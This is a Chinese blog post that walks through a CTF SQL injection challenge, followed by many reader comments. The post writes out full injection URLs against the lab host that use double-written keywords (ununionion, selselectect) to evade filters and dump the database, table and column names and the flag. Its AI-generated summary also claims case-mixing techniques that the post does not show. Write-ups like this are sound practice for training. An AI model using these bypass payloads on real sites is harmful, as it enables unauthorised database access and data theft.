CTF论剑场-SQL注入~~~

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试879,561字数 194阅读0分38秒阅读模式
AI智能摘要
你是否以为被过滤了 `union` 和 `select` 就能彻底防住SQL注入?本文带你深入一道CTF实战题,揭秘如何绕过关键词过滤,巧妙利用大小写混淆与双写绕过技术,一步步实现SQL注入攻击。从判断注入点、探测字段数,到爆库、爆表、爆字段,完整还原攻击链路,手把手教你拿下flag。网络安全攻防背后,远比你想象的更惊险。
— AI 生成的文章内容摘要

根据题目提示,这道题是个SQL注入题,于是我们直接试探SQL注入,看到页面有个list点开看看

CTF论剑场-SQL注入~~~-图片1

看着链接的样子就是有SQL注入的样子,哈哈哈,接下来让试试它过滤了啥,怎么闭合吧。通过测试发现,过滤了and 、or、select、union,最后试出来列数量是3,如下图:

CTF论剑场-SQL注入~~~-图片2

接下来,爆数据库
http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,database(),3--+
数据库名为web18

CTF论剑场-SQL注入~~~-图片3

继续,爆表名

http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+

CTF论剑场-SQL注入~~~-图片4

爆字段名:
http://123.206.31.85:10018/list.php?id=-2' ununionion selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='web18'--+

CTF论剑场-SQL注入~~~-图片5

爆字段:
http://123.206.31.85:10018/list.php?id=-1' anandd 1=1 uniunionon seleselectct 1,flag,3 from flag--+

CTF论剑场-SQL注入~~~-图片6

http://www.oniont.cn/index.php/archives/48.html

 
OnionT@KillBoy
评论  87  访客  87
    • 逐梦行
      逐梦行 0

      这题过滤得有点狠啊,ununionion都出来了😂

      • 故里长安
        故里长安 0

        flag.php那个链接是不是直接能拿flag?

        • 陨星
          陨星 0

          之前做过类似的,双写绕过真折磨人

            • 破浪前行
              破浪前行 1

              @ 陨星 双写确实坑,记得多试几种写法,刚好上次卡了半小时

            • 夜阑灯烬
              夜阑灯烬 1

              为啥不用order by爆列数?

              • 黑洞探索者
                黑洞探索者 0

                看着步骤挺顺,但实际跑的时候总403咋回事?

                • 静静煮茶
                  静静煮茶 0

                  hhh 这不就是经典information_schema套路嘛

                  • 腐骨剑圣
                    腐骨剑圣 0

                    新手问下:–+是注释后面的意思吗?

                    • 矩阵视觉
                      矩阵视觉 0

                      太硬核了,我连list.php都没找到在哪注入

                        • 安静星
                          安静星 0

                          @ 矩阵视觉 list.php在URL里不就明摆着嘛,你不会在源码里翻吧?

                        • 夕子
                          夕子 0

                          爆表名那段group_concat会不会被截断啊?

                          • Mercurial Bloom
                            Mercurial Bloom 0

                            那个Python官网图是干扰项吧,跟SQL注入有啥关系🤔

                              • 比特客
                                比特客 0

                                @ Mercurial Bloom 那个Python图八成是放错图,要真有关也太隐晦了

                              • 夜枭之眼
                                夜枭之眼 0

                                感觉步骤讲得太简略了,双写绕过的细节能多说点不?

                                  • 失落的落叶
                                    失落的落叶 0

                                    @ 夜枭之眼 双写绕过就是ununionion这种,把关键字拆开再拼回去

                                  • 书页轻
                                    书页轻 0

                                    –+就是注释符,跟#差不多

                                    • 青柠苏打
                                      青柠苏打 1

                                      这题环境还在吗?想自己实操一遍

                                        • 林夕
                                          林夕 0

                                          @ 青柠苏打 我刚刚还跑通了,建议换IP或等会儿再试,环境偶尔会掉

                                        • 算师金
                                          算师金 1

                                          Python图明显是放错了吧,完全无关😂

                                          • 梦之絮语
                                            梦之絮语 0

                                            information_schema套路用烂了都

                                            • 泡泡小果冻
                                              泡泡小果冻 0

                                              flag.php直接访问肯定不行啊,得注入

                                              • 逆风局
                                                逆风局 0

                                                为啥不用order by+1慢慢试?

                                                • 阳光小王子
                                                  阳光小王子 0

                                                  ununionion这写法看得眼睛疼

                                                  • 寒露凝霜
                                                    寒露凝霜 1

                                                    list.php注入点找起来确实费劲

                                                    • 丑角笑谈
                                                      丑角笑谈 0

                                                      403是不是靶机关了?

                                                        • 幽梦拾光
                                                          幽梦拾光 0

                                                          @ 丑角笑谈 之前做实验也这样,WAF突然抽风,以为自己写错,结果是被封IP了

                                                          • 诗舟
                                                            诗舟 1

                                                            @ 丑角笑谈 这题我也403了,估计服务挂了

                                                          • 狂喜时刻
                                                            狂喜时刻 1

                                                            这题过滤也太狠了吧,连and都干掉,离谱

                                                            • SavageX
                                                              SavageX 1

                                                              Python官网图放这真的不是迷惑?完全看不懂关联在哪

                                                              • 我是个笑话
                                                                我是个笑话 0

                                                                爆表名用group_concat,长度限制不会出问题吗?

                                                                  • 陶匠青陶
                                                                    陶匠青陶 0

                                                                    @ 我是个笑话 group_concat长度限制确实烦,有时只能分批次查

                                                                  • 夏荷映日
                                                                    夏荷映日 0

                                                                    flag.php直接访问403,果然是得靠注入才行😂

                                                                    • Sus
                                                                      Sus 0

                                                                      list.php的id参数真难找,我一开始全在body里找注入点

                                                                      • 极速浪客
                                                                        极速浪客 0

                                                                        双写绕过写得跟密码本似的,ununionion是个人都懵

                                                                          • 橡皮泥创意家
                                                                            橡皮泥创意家 0

                                                                            @ 极速浪客 ununionion这写法确实脑洞大,但绕过滤贼有效。

                                                                          • 远方的回声
                                                                            远方的回声 0

                                                                            我之前搞靶机也遇到这情况,折腾半天才发现是WAF拦截

                                                                            • 春日絮语
                                                                              春日絮语 0

                                                                              这手法老套路了,但每次都能卡新人十分钟

                                                                                • 盖亚大地
                                                                                  盖亚大地 1

                                                                                  @ 春日絮语 刚入坑的表示,这种套路题真能卡住新手半天。

                                                                                • 宇宙漂流瓶
                                                                                  宇宙漂流瓶 0

                                                                                  爆字段那步能不能换个方式?总怕concat截断

                                                                                    • 柚子君
                                                                                      柚子君 0

                                                                                      @ 宇宙漂流瓶 这绕过滤的方法绝了,之前比赛用过类似的

                                                                                      • 糖果小星星
                                                                                        糖果小星星 0

                                                                                        @ 宇宙漂流瓶 group_concat截断确实坑,试过用limit分段查,能绕但慢

                                                                                        • 超维代码
                                                                                          超维代码 1

                                                                                          @ 宇宙漂流瓶 Python官网图放这真的不是搞笑?跟注入八竿子打不着

                                                                                        • 自闭开关
                                                                                          自闭开关 1

                                                                                          环境好像真关了,curl都连不上,蹲个恢复通知

                                                                                            • Ghosted
                                                                                              Ghosted 0

                                                                                              @ 自闭开关 我这边也连不进去,估计是防火墙又拦了,等官方恢复吧

                                                                                              • 晨曦科技
                                                                                                晨曦科技 0

                                                                                                @ 自闭开关 curl都连不上,估计服务端直接撤了😂

                                                                                                • 云途智能
                                                                                                  云途智能 0

                                                                                                  @ 自闭开关 flag.php都403了还放链接,不就是让咱们注入么

                                                                                                • 腐骨傀儡师
                                                                                                  腐骨傀儡师 0

                                                                                                  666,这绕过方式太野了,实际比赛遇到直接心态崩

                                                                                                  • 软软糯糯
                                                                                                    软软糯糯 1

                                                                                                    这题要真能直接拿flag谁还折腾注入啊,别想太美

                                                                                                    • 眠间星
                                                                                                      眠间星 0

                                                                                                      双写union我都试过,关键得看后端怎么解析,玄学

                                                                                                      • 弓手韩
                                                                                                        弓手韩 0

                                                                                                        information_schema用多了,一眼就猜到是查表结构

                                                                                                        • 青衫隐
                                                                                                          青衫隐 0

                                                                                                          新手问下–+和#在SQL里效果真的一样?

                                                                                                            • 灵动鱼小游
                                                                                                              灵动鱼小游 0

                                                                                                              @ 青衫隐 –+和#都是注释符,但有些数据库对#解析不一样

                                                                                                              • 奶茶喵
                                                                                                                奶茶喵 1

                                                                                                                @ 青衫隐 –+和#都行,但–+在URL里更稳,不容易被转义

                                                                                                              • 寂静山岚
                                                                                                                寂静山岚 0

                                                                                                                403大概率是IP被封或者服务停了,不是你操作问题

                                                                                                                • 狐狸闪
                                                                                                                  狐狸闪 0

                                                                                                                  说实在的,这种题就是拼熟练度,套路熟了秒解

                                                                                                                  • 暗影狐
                                                                                                                    暗影狐 0

                                                                                                                    之前做实验环境也这样,注着注着就403,气死

                                                                                                                    • VeilOfSolitude
                                                                                                                      VeilOfSolitude 1

                                                                                                                      绕过滤的方法有点意思

                                                                                                                        • WaffleCone
                                                                                                                          WaffleCone 1

                                                                                                                          @ VeilOfSolitude 双写绕过挺经典的

                                                                                                                        • FlexKing
                                                                                                                          FlexKing 0

                                                                                                                          Python图放这完全看不懂,跟注入有啥关系啊

                                                                                                                          • 你是懂xx的
                                                                                                                            你是懂xx的 0

                                                                                                                            注入点真难找,我在url里翻半天才看到id参数

                                                                                                                            • 薄荷初夏
                                                                                                                              薄荷初夏 1

                                                                                                                              双写绕过看着就头大,每次都要试半天

                                                                                                                              • 意识星云
                                                                                                                                意识星云 0

                                                                                                                                flag.php直接访问不行?那还放链接干嘛

                                                                                                                                • 皮城女警
                                                                                                                                  皮城女警 0

                                                                                                                                  这靶机是不是关了,一直连不上

                                                                                                                                    • CodeWizard
                                                                                                                                      CodeWizard 0

                                                                                                                                      @ 皮城女警 连不上+1,应该是靶机挂了。

                                                                                                                                    • 无敌帅
                                                                                                                                      无敌帅 0

                                                                                                                                      information_schema用烂了,出题人能不能换个花样

                                                                                                                                      • Peace小和平
                                                                                                                                        Peace小和平 1

                                                                                                                                        实际测试发现过滤规则比写的还严格,union都难用

                                                                                                                                        • 社交达人
                                                                                                                                          社交达人 0

                                                                                                                                          这题环境又炸了?403搞得人一脸懵

                                                                                                                                          • 虚空马戏团的小丑
                                                                                                                                            虚空马戏团的小丑 0

                                                                                                                                            双写绕过纯看后端解析,我上次测的时候连sleep都过滤了,离谱

                                                                                                                                            • 锦绣缘
                                                                                                                                              锦绣缘 0

                                                                                                                                              新手+1,–+和#到底有啥区别啊?文档说一样但总怕翻车

                                                                                                                                              • 朝露晶莹
                                                                                                                                                朝露晶莹 0

                                                                                                                                                information_schema查表查到吐,能不能来点新花样啊

                                                                                                                                                • 狂野女猎手
                                                                                                                                                  狂野女猎手 0

                                                                                                                                                  注入点藏得深就算了,环境还随时挂,练个题跟闯关似的

                                                                                                                                                  • 服务器侠
                                                                                                                                                    服务器侠 1

                                                                                                                                                    双写绕过有点意思,就是看着费眼。

                                                                                                                                                    • 林间过客
                                                                                                                                                      林间过客 0

                                                                                                                                                      这环境也太不稳定了吧,动不动就403。

                                                                                                                                                      • 义体浪人
                                                                                                                                                        义体浪人 1

                                                                                                                                                        –+和#到底哪个注释符更稳啊?

                                                                                                                                                        • 甜心小怪兽
                                                                                                                                                          甜心小怪兽 0

                                                                                                                                                          双写绕过纯看后端,上次我测的连括号都过滤了。

                                                                                                                                                          • 幽梦穿梭
                                                                                                                                                            幽梦穿梭 0

                                                                                                                                                            能不能把绕过过滤的具体规则讲讲?

                                                                                                                                                            • 剑九幽
                                                                                                                                                              剑九幽 1

                                                                                                                                                              这种题练手还行,但信息太老了。

                                                                                                                                                              • 小兔子糖
                                                                                                                                                                小兔子糖 1

                                                                                                                                                                Python图放这儿完全看不懂,跟注入有啥关系。

                                                                                                                                                                • WokeAF
                                                                                                                                                                  WokeAF 0

                                                                                                                                                                  ununionion看得我眼花缭乱,这什么魔鬼写法😂

                                                                                                                                                                  • 老时光的你
                                                                                                                                                                    老时光的你 0

                                                                                                                                                                    之前做实验也碰到这种过滤,差点把键盘砸了

                                                                                                                                                                    • 狂战天神
                                                                                                                                                                      狂战天神 1

                                                                                                                                                                      flag.php直接访问肯定没戏,不然还注入干嘛

                                                                                                                                                                      • 时空旅者
                                                                                                                                                                        时空旅者 0

                                                                                                                                                                        information_schema这老套路用了八百遍了

                                                                                                                                                                        • 青龙
                                                                                                                                                                          青龙 0

                                                                                                                                                                          新手完全看不懂,有更简单的教程吗

                                                                                                                                                                          • RuneShade
                                                                                                                                                                            RuneShade 1

                                                                                                                                                                            过滤and or这招有点狠啊

                                                                                                                                                                              • SerenadeOfShadows
                                                                                                                                                                                SerenadeOfShadows 1

                                                                                                                                                                                @ RuneShade 这招防新手还挺管用

                                                                                                                                                                              • 夜读灯火
                                                                                                                                                                                夜读灯火 0

                                                                                                                                                                                group_concat会不会被截断啊,之前就被坑过

                                                                                                                                                                                • 鬼火瞳
                                                                                                                                                                                  鬼火瞳 0

                                                                                                                                                                                  这环境也太不稳定了,练个题真费劲

                                                                                                                                                                                匿名

                                                                                                                                                                                发表评论

                                                                                                                                                                                匿名网友

                                                                                                                                                                                拖动滑块以完成验证